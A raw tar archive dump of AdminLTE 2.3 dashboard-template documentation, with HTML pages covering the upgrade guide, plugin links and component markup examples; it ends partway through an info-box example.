/home/mip/public_html/vendor/laravel-filemanager/files/folder-1/821668/build.tar
index.html000066400000017013152434262030006546 0ustar00<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>AdminLTE 2 | Documentation</title>
    <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
    <!-- Bootstrap 3.3.5 -->
    <link rel="stylesheet" href="../bootstrap/css/bootstrap.min.css">
    <!-- Font Awesome -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css">
    <!-- Ionicons -->
    <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css">
    <!-- Theme style -->
    <link rel="stylesheet" href="../dist/css/AdminLTE.min.css">
    <link rel="stylesheet" href="../dist/css/skins/_all-skins.min.css">
    <link rel="stylesheet" href="style.css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
        <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
  </head>
  <body class="skin-blue fixed" data-spy="scroll" data-target="#scrollspy">
    <div class="wrapper">

      <header class="main-header">
        <!-- Logo -->
        <!-- Logo -->
        <a href="../index2.html" class="logo">
          <!-- mini logo for sidebar mini 50x50 pixels -->
          <span class="logo-mini"><b>A</b>LT</span>
          <!-- logo for regular state and mobile devices -->
          <span class="logo-lg"><b>Admin</b>LTE</span>
        </a>
        <!-- Header Navbar: style can be found in header.less -->
        <nav class="navbar navbar-static-top" role="navigation">
          <!-- Sidebar toggle button-->
          <a href="#" class="sidebar-toggle" data-toggle="offcanvas" role="button">
            <span class="sr-only">Toggle navigation</span>
          </a>
          <!-- Navbar Right Menu -->
          <div class="navbar-custom-menu">
            <ul class="nav navbar-nav">
              <li><a href="http://almsaeedstudio.com">Almsaeed Studio</a></li>
              <li><a href="http://almsaeedstudio.com/premium">Premium Templates</a></li>
            </ul>
          </div>
        </nav>
      </header>
      <!-- Left side column. contains the logo and sidebar -->
      <aside class="main-sidebar">
        <!-- sidebar: style can be found in sidebar.less -->
        <div class="sidebar" id="scrollspy">

          <!-- sidebar menu: : style can be found in sidebar.less -->
          <ul class="nav sidebar-menu">
            <li class="header">TABLE OF CONTENTS</li>
            <li class="active"><a href="#introduction"><i class="fa fa-circle-o"></i> Introduction</a></li>
            <li><a href="#download"><i class="fa fa-circle-o"></i> Download</a></li>
            <li><a href="#dependencies"><i class="fa fa-circle-o"></i> Dependencies</a></li>
            <li><a href="#advice"><i class="fa fa-circle-o"></i> Advice</a></li>
            <li><a href="#layout"><i class="fa fa-circle-o"></i> Layout</a></li>
            <li><a href="#adminlte-options"><i class="fa fa-circle-o"></i> Javascript Options</a></li>
            <li class="treeview" id="scrollspy-components">
              <a href="javascript::;"><i class="fa fa-circle-o"></i> Components</a>
              <ul class="nav treeview-menu">
                <li><a href="#component-main-header">Main Header</a></li>
                <li><a href="#component-sidebar">Sidebar</a></li>
                <li><a href="#component-control-sidebar">Control Sidebar</a></li>
                <li><a href="#component-info-box">Info Box</a></li>
                <li><a href="#component-box">Boxes</a></li>
                <li><a href="#component-direct-chat">Direct Chat</a></li>
              </ul>
            </li>
            <li><a href="#plugins"><i class="fa fa-circle-o"></i> Plugins</a></li>
            <li><a href="#browsers"><i class="fa fa-circle-o"></i> Browser Support</a></li>
            <li><a href="#upgrade"><i class="fa fa-circle-o"></i> Upgrade Guide</a></li>
            <li><a href="#implementations"><i class="fa fa-circle-o"></i> Implementations</a></li>
            <li><a href="#faq"><i class="fa fa-circle-o"></i> FAQ</a></li>
            <li><a href="#license"><i class="fa fa-circle-o"></i> License</a></li>
          </ul>
        </div>
        <!-- /.sidebar -->
      </aside>

      <!-- Content Wrapper. Contains page content -->
      <div class="content-wrapper">
        <!-- Content Header (Page header) -->
        <div class="content-header">
          <h1>
            AdminLTE Documentation
            <small>Current version 2.3.0</small>
          </h1>
          <ol class="breadcrumb">
            <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li>
            <li class="active">Documentation</li>
          </ol>
        </div>

        <!-- Main content -->
        <div class="content body">

include "introduction.html"

<!-- ============================================================= -->

include "download.html"

<!-- ============================================================= -->

include "dependencies.html"

<!-- ============================================================= -->

include "advice.html"

<!-- ============================================================= -->

include "layout.html"

<!-- ============================================================= -->

include "adminlte-options.html"

<!-- ============================================================= -->

include "components.html"

<!-- ============================================================= -->

include "plugins.html"

<!-- ============================================================= -->

include "browsers.html"

<!-- ============================================================= -->

include "upgrade.html"

<!-- ============================================================= -->

include "implementations.html"

<!-- ============================================================= -->

include "faq.html"

<!-- ============================================================= -->

include "license.html"

        </div><!-- /.content -->
      </div><!-- /.content-wrapper -->

      <footer class="main-footer">
        <div class="pull-right hidden-xs">
          <b>Version</b> 2.3.2
        </div>
        <strong>Copyright &copy; 2014-2015 <a href="http://almsaeedstudio.com">Almsaeed Studio</a>.</strong> All rights reserved.
      </footer>

      <!-- Control Sidebar -->
      <aside class="control-sidebar control-sidebar-dark">
        <!-- Create the tabs -->
        <div class="pad">
          This is an example of the control sidebar.
        </div>
      </aside><!-- /.control-sidebar -->
      <!-- Add the sidebar's background. This div must be placed
           immediately after the control sidebar -->
      <div class="control-sidebar-bg"></div>

    </div><!-- ./wrapper -->

    <!-- jQuery 2.1.4 -->
    <script src="../plugins/jQuery/jQuery-2.1.4.min.js"></script>
    <!-- Bootstrap 3.3.5 -->
    <script src="../bootstrap/js/bootstrap.min.js"></script>
    <!-- FastClick -->
    <script src="../plugins/fastclick/fastclick.min.js"></script>
    <!-- AdminLTE App -->
    <script src="../dist/js/app.min.js"></script>
    <!-- SlimScroll 1.3.0 -->
    <script src="../plugins/slimScroll/jquery.slimscroll.min.js"></script>
    <script src="https://google-code-prettify.googlecode.com/svn/loader/run_prettify.js"></script>
    <script src="docs.js"></script>
  </body>
</html>
include/upgrade.html000066400000003423152434262030010511 0ustar00<section id="upgrade">
  <h2 class="page-header"><a href="#upgrade">Upgrade Guide</a></h2>
  <p class="lead">To upgrade from version 1.x to the lateset version, follow this guide.</p>
  <h3>New Files</h3>
  <p>Make sure you update all CSS and JS files that are related to AdminLTE. Otherwise, the layout will not
    function properly. Most important files are AdminLTE.css, skins CSS files, and app.js.</p>
  <h3>Layout Changes</h3>
  <ol>
    <li>The .wrapper div must be placed immediately after the body tag rather than after the header</li>
    <li>Change the .header div to .main-header <code>&LT;div class="main-header"></code></li>
    <li>Change the .right-side class to .content-wrapper <code>&LT;div class="content-wrapper"></code></li>
    <li>Change the .left-side class to .main-sidebar <code>&LT;div class="main-sidebar"></code></li>
    <li>In the navbar, change .navbar-right to .navbar-custom-menu <code>&LT;div class="navbar-custom-menu"></code></li>
  </ol>
  <h3>Navbar Custom Dropdown Menus</h3>
  <ol>
    <li>The icons in the notification menu do not need bg-* classes. They should be replaced with contextual text color class such as text-aqua or text-red.</li>
  </ol>
  <h3>Login, Registration and Lockscreen Pages</h3>
  <p>There are major changes to the HTML markup and style to these pages. The best way is to copy the page's code and customize it.</p>
  <p>And you should be set to go!</p>
  <h3>Mailbox</h3>
  <p>Mailbox got an upgrade to include three different views. The views are inbox, read mail, and compose new email. To use these views,
    you should use the provided HTML files in the pages/mailbox folder.</p>
  <p><b class="text-red">Note:</b> the old mailbox layout has been deprecated in favor of the new one and will be removed by the next release.</p>
</section>
include/plugins.html000066400000005405152434262030010545 0ustar00<section id="plugins">
  <h2 class="page-header"><a href="#plugins">Plugins</a></h2>
  <p class="lead">AdminLTE makes use of the following plugins. For documentation, updates or license information, please visit the provided links.</p>
  <div class="row bring-up">
    <div class="col-sm-3">
      <ul class="list-unstyled">
        <li><h4>Charts</h4></li>
        <li><a href="http://www.chartjs.org/" target="_blank">ChartJS</a></li>
        <li><a href="http://www.flotcharts.org/" target="_blank">Flot</a></li>
        <li><a href="http://morrisjs.github.io/morris.js/" target="_blank">Morris.js</a></li>
        <li><a href="http://omnipotent.net/jquery.sparkline/" target="_blank">Sparkline</a></li>
      </ul>
    </div><!-- /.col -->
    <div class="col-sm-3">
      <ul class="list-unstyled">
        <li><h4>Form Elements</h4></li>
        <li><a href="https://github.com/seiyria/bootstrap-slider/">Bootstrap Slider</a></li>
        <li><a href="http://ionden.com/a/plugins/ion.rangeSlider/en.html" target="_blank">Ion Slider</a></li>
        <li><a href="http://bootstrap-datepicker.readthedocs.org/" target="_blank">Date Picker</a></li>
        <li><a href="http://www.daterangepicker.com/" target="_blank">Date Range Picker</a></li>
        <li><a href="http://mjolnic.com/bootstrap-colorpicker/" target="_blank">Color Picker</a></li>
        <li><a href="https://github.com/jdewit/bootstrap-timepicker/" target="_blank">Time Picker</a></li>
        <li><a href="http://fronteed.com/iCheck/" target="_blank">iCheck</a></li>
        <li><a href="https://github.com/RobinHerbots/jquery.inputmask/" target="_blank">Input Mask</a></li>
      </ul>
    </div><!-- /.col -->
    <div class="col-sm-3">
      <ul class="list-unstyled">
        <li><h4>Editors</h4></li>
        <li><a href="https://github.com/bootstrap-wysiwyg/bootstrap3-wysiwyg/" target="_blank">Bootstrap WYSIHTML5</a></li>
        <li><a href="http://ckeditor.com/" target="_blank">CK Editor</a></li>
      </ul>
    </div><!-- /. col -->
    <div class="col-sm-3">
      <ul class="list-unstyled">
        <li><h4>Other</h4></li>
        <li><a href="https://datatables.net/examples/styling/bootstrap.html" target="_blank">DataTables</a></li>
        <li><a href="http://fullcalendar.io/" target="_blank">Full Calendar</a></li>
        <li><a href="http://jqueryui.com/" target="_blank">jQuery UI</a></li>
        <li><a href="http://anthonyterrien.com/knob/" target="_blank">jQuery Knob</a></li>
        <li><a href="http://jvectormap.com/" target="_blank">jVector Map</a></li>
        <li><a href="http://rocha.la/jQuery-slimScroll/" target="_blank">Slim Scroll</a></li>
        <li><a href="http://github.hubspot.com/pace/docs/welcome/" target="_blank">Pace</a></li>
      </ul>
    </div><!-- /.col -->
  </div><!-- /.row -->
</section>
include/components.html000066400000213111152434262030011244 0ustar00<section id="components" data-spy="scroll" data-target="#scrollspy-components">
  <h2 class="page-header"><a href="#components">Components</a></h2>
  <div class="callout callout-info lead">
    <h4>Reminder!</h4>
    <p>
      AdminLTE uses all of Bootstrap 3 components. It's a good start to review
      the <a href="http://getbootstrap.com">Bootstrap documentation</a> to get an idea of the various components
      that this documentation <b>does not</b> cover.
    </p>
  </div>
  <div class="callout callout-danger lead">
    <h4>Tip!</h4>
    <p>
      If you go through the example pages and would like to copy a component, right-click on
      the component and choose "inspect element" to get to the HTML quicker than scanning
      the HTML page.
    </p>
  </div>
  <h3 id="component-main-header">Main Header</h3>
  <p class="lead">The main header contains the logo and navbar. Construction of the
    navbar differs slightly from Bootstrap because it has components that Bootstrap doesn't provide.
    The navbar can be constructed in two way. This an example for the normal navbar and next we will provide an example for
    the top nav layout.</p>
  <div class="box box-solid">
    <div class="box-body" style="position: relative;">
      <span class="eg">Main Header Example</span>
      <header class="main-header" style="position: relative;">
        <!-- Logo -->
        <a href="index2.html" class="logo" style="position: relative;"><b>Admin</b>LTE</a>
        <!-- Header Navbar: style can be found in header.less -->
        <nav class="navbar" role="navigation" style="border: 0;max-height: 50px;">
          <!-- Sidebar toggle button-->
          <a href="#" class="sidebar-toggle" role="button">
            <span class="sr-only">Toggle navigation</span>
          </a>
          <!-- Navbar Right Menu -->
          <div class="navbar-custom-menu">
            <ul class="nav navbar-nav">
              <!-- Messages: style can be found in dropdown.less-->
              <li class="dropdown messages-menu">
                <a href="#" class="dropdown-toggle" data-toggle="dropdown">
                  <i class="fa fa-envelope-o"></i>
                  <span class="label label-success">4</span>
                </a>
                <ul class="dropdown-menu">
                  <li class="header">You have 4 messages</li>
                  <li>
                    <!-- inner menu: contains the actual data -->
                    <ul class="menu">
                      <li><!-- start message -->
                        <a href="#">
                          <div class="pull-left">
                            <img src="../dist/img/user2-160x160.jpg" class="img-circle" alt="User Image">
                          </div>
                          <h4>
                            Support Team
                            <small><i class="fa fa-clock-o"></i> 5 mins</small>
                          </h4>
                          <p>Why not buy a new awesome theme?</p>
                        </a>
                      </li><!-- end message -->
                    </ul>
                  </li>
                  <li class="footer"><a href="#">See All Messages</a></li>
                </ul>
              </li>
              <!-- Notifications: style can be found in dropdown.less -->
              <li class="dropdown notifications-menu">
                <a href="#" class="dropdown-toggle" data-toggle="dropdown">
                  <i class="fa fa-bell-o"></i>
                  <span class="label label-warning">10</span>
                </a>
                <ul class="dropdown-menu">
                  <li class="header">You have 10 notifications</li>
                  <li>
                    <!-- inner menu: contains the actual data -->
                    <ul class="menu">
                      <li>
                        <a href="#">
                          <i class="fa fa-users text-aqua"></i> 5 new members joined today
                        </a>
                      </li>
                    </ul>
                  </li>
                  <li class="footer"><a href="#">View all</a></li>
                </ul>
              </li>
              <!-- Tasks: style can be found in dropdown.less -->
              <li class="dropdown tasks-menu">
                <a href="#" class="dropdown-toggle" data-toggle="dropdown">
                  <i class="fa fa-flag-o"></i>
                  <span class="label label-danger">9</span>
                </a>
                <ul class="dropdown-menu">
                  <li class="header">You have 9 tasks</li>
                  <li>
                    <!-- inner menu: contains the actual data -->
                    <ul class="menu">
                      <li><!-- Task item -->
                        <a href="#">
                          <h3>
                            Design some buttons
                            <small class="pull-right">20%</small>
                          </h3>
                          <div class="progress xs">
                            <div class="progress-bar progress-bar-aqua" style="width: 20%" role="progressbar" aria-valuenow="20" aria-valuemin="0" aria-valuemax="100">
                              <span class="sr-only">20% Complete</span>
                            </div>
                          </div>
                        </a>
                      </li><!-- end task item -->
                    </ul>
                  </li>
                  <li class="footer">
                    <a href="#">View all tasks</a>
                  </li>
                </ul>
              </li>
              <!-- User Account: style can be found in dropdown.less -->
              <li class="dropdown user user-menu">
                <a href="#" class="dropdown-toggle" data-toggle="dropdown">
                  <img src="../dist/img/user2-160x160.jpg" class="user-image" alt="User Image">
                  <span class="hidden-xs">Alexander Pierce</span>
                </a>
                <ul class="dropdown-menu">
                  <!-- User image -->
                  <li class="user-header">
                    <img src="../dist/img/user2-160x160.jpg" class="img-circle" alt="User Image">
                    <p>
                      Alexander Pierce - Web Developer
                      <small>Member since Nov. 2012</small>
                    </p>
                  </li>
                  <!-- Menu Body -->
                  <li class="user-body">
                    <div class="col-xs-4 text-center">
                      <a href="#">Followers</a>
                    </div>
                    <div class="col-xs-4 text-center">
                      <a href="#">Sales</a>
                    </div>
                    <div class="col-xs-4 text-center">
                      <a href="#">Friends</a>
                    </div>
                  </li>
                  <!-- Menu Footer-->
                  <li class="user-footer">
                    <div class="pull-left">
                      <a href="#" class="btn btn-default btn-flat">Profile</a>
                    </div>
                    <div class="pull-right">
                      <a href="#" class="btn btn-default btn-flat">Sign out</a>
                    </div>
                  </li>
                </ul>
              </li>
            </ul>
          </div>
        </nav>
      </header>
    </div>
  </div>
  <pre class="prettyprint">&LT;header class="main-header">
  &LT;a href="../../index2.html" class="logo">
    &LT;!-- LOGO -->
    AdminLTE
  &LT;/a>
  &LT;!-- Header Navbar: style can be found in header.less -->
  &LT;nav class="navbar navbar-static-top" role="navigation">
    &LT;!-- Navbar Right Menu -->
    &LT;div class="navbar-custom-menu">
      &LT;ul class="nav navbar-nav">
        &LT;!-- Messages: style can be found in dropdown.less-->
        &LT;li class="dropdown messages-menu">
          &LT;a href="#" class="dropdown-toggle" data-toggle="dropdown">
            &LT;i class="fa fa-envelope-o">&LT;/i>
            &LT;span class="label label-success">4&LT;/span>
          &LT;/a>
          &LT;ul class="dropdown-menu">
            &LT;li class="header">You have 4 messages&LT;/li>
            &LT;li>
              &LT;!-- inner menu: contains the actual data -->
              &LT;ul class="menu">
                &LT;li>&LT;!-- start message -->
                  &LT;a href="#">
                    &LT;div class="pull-left">
                      &LT;img src="dist/img/user2-160x160.jpg" class="img-circle" alt="User Image">
                    &LT;/div>
                    &LT;h4>
                      Sender Name
                      &LT;small>&LT;i class="fa fa-clock-o">&LT;/i> 5 mins&LT;/small>
                    &LT;/h4>
                    &LT;p>Message Excerpt&LT;/p>
                  &LT;/a>
                &LT;/li>&LT;!-- end message -->
                ...
              &LT;/ul>
            &LT;/li>
            &LT;li class="footer">&LT;a href="#">See All Messages&LT;/a>&LT;/li>
          &LT;/ul>
        &LT;/li>
        &LT;!-- Notifications: style can be found in dropdown.less -->
        &LT;li class="dropdown notifications-menu">
          &LT;a href="#" class="dropdown-toggle" data-toggle="dropdown">
            &LT;i class="fa fa-bell-o">&LT;/i>
            &LT;span class="label label-warning">10&LT;/span>
          &LT;/a>
          &LT;ul class="dropdown-menu">
            &LT;li class="header">You have 10 notifications&LT;/li>
            &LT;li>
              &LT;!-- inner menu: contains the actual data -->
              &LT;ul class="menu">
                &LT;li>
                  &LT;a href="#">
                    &LT;i class="ion ion-ios-people info">&LT;/i> Notification title
                  &LT;/a>
                &LT;/li>
                ...
              &LT;/ul>
            &LT;/li>
            &LT;li class="footer">&LT;a href="#">View all&LT;/a>&LT;/li>
          &LT;/ul>
        &LT;/li>
        &LT;!-- Tasks: style can be found in dropdown.less -->
        &LT;li class="dropdown tasks-menu">
          &LT;a href="#" class="dropdown-toggle" data-toggle="dropdown">
            &LT;i class="fa fa-flag-o">&LT;/i>
            &LT;span class="label label-danger">9&LT;/span>
          &LT;/a>
          &LT;ul class="dropdown-menu">
            &LT;li class="header">You have 9 tasks&LT;/li>
            &LT;li>
              &LT;!-- inner menu: contains the actual data -->
              &LT;ul class="menu">
                &LT;li>&LT;!-- Task item -->
                  &LT;a href="#">
                    &LT;h3>
                      Design some buttons
                      &LT;small class="pull-right">20%&LT;/small>
                    &LT;/h3>
                    &LT;div class="progress xs">
                      &LT;div class="progress-bar progress-bar-aqua" style="width: 20%" role="progressbar" aria-valuenow="20" aria-valuemin="0" aria-valuemax="100">
                        &LT;span class="sr-only">20% Complete&LT;/span>
                      &LT;/div>
                    &LT;/div>
                  &LT;/a>
                &LT;/li>&LT;!-- end task item -->
                ...
              &LT;/ul>
            &LT;/li>
            &LT;li class="footer">
              &LT;a href="#">View all tasks&LT;/a>
            &LT;/li>
          &LT;/ul>
        &LT;/li>
        &LT;!-- User Account: style can be found in dropdown.less -->
        &LT;li class="dropdown user user-menu">
          &LT;a href="#" class="dropdown-toggle" data-toggle="dropdown">
            &LT;img src="dist/img/user2-160x160.jpg" class="user-image" alt="User Image">
            &LT;span class="hidden-xs">Alexander Pierce&LT;/span>
          &LT;/a>
          &LT;ul class="dropdown-menu">
            &LT;!-- User image -->
            &LT;li class="user-header">
              &LT;img src="dist/img/user2-160x160.jpg" class="img-circle" alt="User Image">
              &LT;p>
                Alexander Pierce - Web Developer
                &LT;small>Member since Nov. 2012&LT;/small>
              &LT;/p>
            &LT;/li>
            &LT;!-- Menu Body -->
            &LT;li class="user-body">
              &LT;div class="col-xs-4 text-center">
                &LT;a href="#">Followers&LT;/a>
              &LT;/div>
              &LT;div class="col-xs-4 text-center">
                &LT;a href="#">Sales&LT;/a>
              &LT;/div>
              &LT;div class="col-xs-4 text-center">
                &LT;a href="#">Friends&LT;/a>
              &LT;/div>
            &LT;/li>
            &LT;!-- Menu Footer-->
            &LT;li class="user-footer">
              &LT;div class="pull-left">
                &LT;a href="#" class="btn btn-default btn-flat">Profile&LT;/a>
              &LT;/div>
              &LT;div class="pull-right">
                &LT;a href="#" class="btn btn-default btn-flat">Sign out&LT;/a>
              &LT;/div>
            &LT;/li>
          &LT;/ul>
        &LT;/li>
      &LT;/ul>
    &LT;/div>
  &LT;/nav>
&LT;/header></pre>
  <h4>Top Nav Layout. Main Header Example.</h4>
  <div class="callout callout-info lead">
    <h4>Reminder!</h4>
    <p>To use this main header instead of the regular one, you must add the <code>layout-top-nav</code> class to the body tag.</p>
  </div>
  <div class="box box-solid">
    <div class="box-body layout-top-nav">
      <span class="eg">Top Nav Example</span>
      <header class="main-header">
        <nav class="navbar navbar-static-top">
          <div class="container-fluid">
            <div class="navbar-header">
              <a href="../../index2.html" class="navbar-brand"><b>Admin</b>LTE</a>
              <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar-collapse">
                <i class="fa fa-bars"></i>
              </button>
            </div>

            <!-- Collect the nav links, forms, and other content for toggling -->
            <div class="collapse navbar-collapse" id="navbar-collapse">
              <ul class="nav navbar-nav">
                <li class="active"><a href="#">Link <span class="sr-only">(current)</span></a></li>
                <li><a href="#">Link</a></li>
                <li class="dropdown">
                  <a href="#" class="dropdown-toggle" data-toggle="dropdown">Dropdown <span class="caret"></span></a>
                  <ul class="dropdown-menu" role="menu">
                    <li><a href="#">Action</a></li>
                    <li><a href="#">Another action</a></li>
                    <li><a href="#">Something else here</a></li>
                    <li class="divider"></li>
                    <li><a href="#">Separated link</a></li>
                    <li class="divider"></li>
                    <li><a href="#">One more separated link</a></li>
                  </ul>
                </li>
              </ul>
              <form class="navbar-form navbar-left" role="search">
                <div class="form-group">
                  <input type="text" class="form-control" id="navbar-search-input" placeholder="Search">
                </div>
              </form>
              <ul class="nav navbar-nav navbar-right">
                <li><a href="#">Link</a></li>
                <li class="dropdown">
                  <a href="#" class="dropdown-toggle" data-toggle="dropdown">Dropdown <span class="caret"></span></a>
                  <ul class="dropdown-menu" role="menu">
                    <li><a href="#">Action</a></li>
                    <li><a href="#">Another action</a></li>
                    <li><a href="#">Something else here</a></li>
                    <li class="divider"></li>
                    <li><a href="#">Separated link</a></li>
                  </ul>
                </li>
              </ul>
            </div><!-- /.navbar-collapse -->
          </div><!-- /.container-fluid -->
        </nav>
      </header>
    </div>
  </div>
  <pre class="prettyprint">
&LT;header class="main-header">
  &LT;nav class="navbar navbar-static-top">
    &LT;div class="container-fluid">
    &LT;div class="navbar-header">
      &LT;a href="../../index2.html" class="navbar-brand">&LT;b>Admin&LT;/b>LTE&LT;/a>
      &LT;button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar-collapse">
        &LT;i class="fa fa-bars">&LT;/i>
      &LT;/button>
    &LT;/div>

    &LT;!-- Collect the nav links, forms, and other content for toggling -->
    &LT;div class="collapse navbar-collapse" id="navbar-collapse">
      &LT;ul class="nav navbar-nav">
        &LT;li class="active">&LT;a href="#">Link &LT;span class="sr-only">(current)&LT;/span>&LT;/a>&LT;/li>
        &LT;li>&LT;a href="#">Link&LT;/a>&LT;/li>
        &LT;li class="dropdown">
          &LT;a href="#" class="dropdown-toggle" data-toggle="dropdown">Dropdown &LT;span class="caret">&LT;/span>&LT;/a>
          &LT;ul class="dropdown-menu" role="menu">
            &LT;li>&LT;a href="#">Action&LT;/a>&LT;/li>
            &LT;li>&LT;a href="#">Another action&LT;/a>&LT;/li>
            &LT;li>&LT;a href="#">Something else here&LT;/a>&LT;/li>
            &LT;li class="divider">&LT;/li>
            &LT;li>&LT;a href="#">Separated link&LT;/a>&LT;/li>
            &LT;li class="divider">&LT;/li>
            &LT;li>&LT;a href="#">One more separated link&LT;/a>&LT;/li>
          &LT;/ul>
        &LT;/li>
      &LT;/ul>
      &LT;form class="navbar-form navbar-left" role="search">
        &LT;div class="form-group">
          &LT;input type="text" class="form-control" id="navbar-search-input" placeholder="Search">
        &LT;/div>
      &LT;/form>
      &LT;ul class="nav navbar-nav navbar-right">
        &LT;li>&LT;a href="#">Link&LT;/a>&LT;/li>
        &LT;li class="dropdown">
          &LT;a href="#" class="dropdown-toggle" data-toggle="dropdown">Dropdown &LT;span class="caret">&LT;/span>&LT;/a>
          &LT;ul class="dropdown-menu" role="menu">
            &LT;li>&LT;a href="#">Action&LT;/a>&LT;/li>
            &LT;li>&LT;a href="#">Another action&LT;/a>&LT;/li>
            &LT;li>&LT;a href="#">Something else here&LT;/a>&LT;/li>
            &LT;li class="divider">&LT;/li>
            &LT;li>&LT;a href="#">Separated link&LT;/a>&LT;/li>
          &LT;/ul>
        &LT;/li>
      &LT;/ul>
    &LT;/div>&LT;!-- /.navbar-collapse -->
    &LT;/div>&LT;!-- /.container-fluid -->
  &LT;/nav>
&LT;/header></pre>

  <!-- ===================================================================== -->

  <h3 id="component-sidebar">Sidebar</h3>
  <p class="lead">
    The sidebar used in this page to the left provides an example of what your sidebar should like.
    Construction of a sidebar:
  </p>
  <pre class="prettyprint">
&LT;div class="main-sidebar">
  &LT;!-- Inner sidebar -->
  &LT;div class="sidebar">
    &LT;!-- user panel (Optional) -->
    &LT;div class="user-panel">
      &LT;div class="pull-left image">
        &LT;img src="dist/img/user2-160x160.jpg" class="img-circle" alt="User Image">
      &LT;/div>
      &LT;div class="pull-left info">
        &LT;p>User Name&LT;/p>

        &LT;a href="#">&LT;i class="fa fa-circle text-success">&LT;/i> Online&LT;/a>
      &LT;/div>
    &LT;/div>&LT;!-- /.user-panel -->

    &LT;!-- Search Form (Optional) -->
    &LT;form action="#" method="get" class="sidebar-form">
      &LT;div class="input-group">
        &LT;input type="text" name="q" class="form-control" placeholder="Search...">
        &LT;span class="input-group-btn">
          &LT;button type="submit" name="search" id="search-btn" class="btn btn-flat">&LT;i class="fa fa-search">&LT;/i>&LT;/button>
        &LT;/span>
      &LT;/div>
    &LT;/form>&LT;!-- /.sidebar-form -->

    &LT;!-- Sidebar Menu -->
    &LT;ul class="sidebar-menu">
      &LT;li class="header">HEADER&LT;/li>
      &LT;!-- Optionally, you can add icons to the links -->
      &LT;li class="active">&LT;a href="#">&LT;span>Link&LT;/span>&LT;/a>&LT;&LT;/li>
      &LT;li>&LT;a href="#">&LT;span>Another Link&LT;/span>&LT;/a>&LT;/li>
      &LT;li class="treeview">
        &LT;a href="#">&LT;span>Multilevel&LT;/span> &LT;i class="fa fa-angle-left pull-right">&LT;/i>&LT;/a>
        &LT;ul class="treeview-menu">
          &LT;li>&LT;a href="#">Link in level 2&LT;/a>&LT;/li>
          &LT;li>&LT;a href="#">Link in level 2&LT;/a>&LT;/li>
        &LT;/ul>
      &LT;/li>
    &LT;/ul>&LT;!-- /.sidebar-menu -->

  &LT;/div>&LT;!-- /.sidebar -->
&LT;/div>&LT;!-- /.main-sidebar --></pre>

  <h3 id="component-control-sidebar">Control Sidebar</h3>
  <p class="lead">Control sidebar is the right side bar. It can be used for many purposes and is extremely easy
    to create. The sidebar ships with two different show/hide styles. The first allows the sidebar to
  slide over the content. The second pushes the content to make space for the sidebar. Either of
  these methods can be set through the <a href="#adminlte-options">Javascript options</a>.</p>
  <p class="lead">The following code should be placed within the <code>.wrapper</code> div. I prefer
  to place it right after the footer.</p>
  <p class="lead">Dark Sidebar Markup</p>
<pre class="prettyprint"><code class="lang-html">&LT;!-- The Right Sidebar -->
&LT;aside class="control-sidebar control-sidebar-dark">
  &LT;!-- Content of the sidebar goes here -->
&LT;/aside>
&LT;!-- The sidebar's background -->
&LT;!-- This div must placed right after the sidebar for it to work-->
&LT;div class="control-sidebar-bg">&LT;/div></code></pre>

  <p class="lead">Light Sidebar Markup</p>
<pre class="prettyprint"><code class="lang-html">&LT;!-- The Right Sidebar -->
&LT;aside class="control-sidebar control-sidebar-light">
  &LT;!-- Content of the sidebar goes here -->
&LT;/aside>
&LT;!-- The sidebar's background -->
&LT;!-- This div must placed right after the sidebar for it to work-->
&LT;div class="control-sidebar-bg">&LT;/div></code></pre>

  <p class="lead">Once you create the sidebar, you will need a toggle button to open/close it.
  By adding the attribute <code>data-toggle="control-sidebar"</code> to any button, it will
  automatically act as the toggle button.</p>

  <p class="lead">Toggle Button Example</p>
  <button class="btn btn-primary" data-toggle="control-sidebar">Toggle Right Sidebar</button><br><br>

  <p class="lead">Sidebar Toggle Markup</p>
  <pre class="prettyprint"><code class="lang-html">&LT;button class="btn btn-default" data-toggle="control-sidebar">Toggle Right Sidebar&LT;/button></code></pre>
  <!-- ===================================================================== -->

  <h3 id="component-info-box">Info Box</h3>
  <p class="lead">Info boxes are used to display statistical snippets. There are two types of info boxes.</p>
  <h4>First Type of Info Boxes</h4>
  <!-- Info Boxes -->
  <div class="row">
    <div class="col-md-3 col-sm-6 col-xs-12">
      <div class="info-box">
        <span class="info-box-icon bg-aqua"><i class="fa fa-envelope-o"></i></span>
        <div class="info-box-content">
          <span class="info-box-text">Messages</span>
          <span class="info-box-number">1,410</span>
        </div><!-- /.info-box-content -->
      </div><!-- /.info-box -->
    </div><!-- /.col -->
    <div class="col-md-3 col-sm-6 col-xs-12">
      <div class="info-box">
        <span class="info-box-icon bg-green"><i class="fa fa-flag-o"></i></span>
        <div class="info-box-content">
          <span class="info-box-text">Bookmarks</span>
          <span class="info-box-number">410</span>
        </div><!-- /.info-box-content -->
      </div><!-- /.info-box -->
    </div><!-- /.col -->
    <div class="col-md-3 col-sm-6 col-xs-12">
      <div class="info-box">
        <span class="info-box-icon bg-yellow"><i class="fa fa-files-o"></i></span>
        <div class="info-box-content">
          <span class="info-box-text">Uploads</span>
          <span class="info-box-number">13,648</span>
        </div><!-- /.info-box-content -->
      </div><!-- /.info-box -->
    </div><!-- /.col -->
    <div class="col-md-3 col-sm-6 col-xs-12">
      <div class="info-box">
        <span class="info-box-icon bg-red"><i class="fa fa-star-o"></i></span>
        <div class="info-box-content">
          <span class="info-box-text">Likes</span>
          <span class="info-box-number">93,139</span>
        </div><!-- /.info-box-content -->
      </div><!-- /.info-box -->
    </div><!-- /.col -->
  </div><!-- /.row -->
  <p class="lead">Markup</p>
  <pre class="prettyprint"><code class="lang-html">&LT;div class="info-box">
  &LT;!-- Apply any bg-* class to to the icon to color it -->
  &LT;span class="info-box-icon bg-red">&LT;i class="fa fa-star-o">&LT;/i>&LT;/span>
  &LT;div class="info-box-content">
    &LT;span class="info-box-text">Likes&LT;/span>
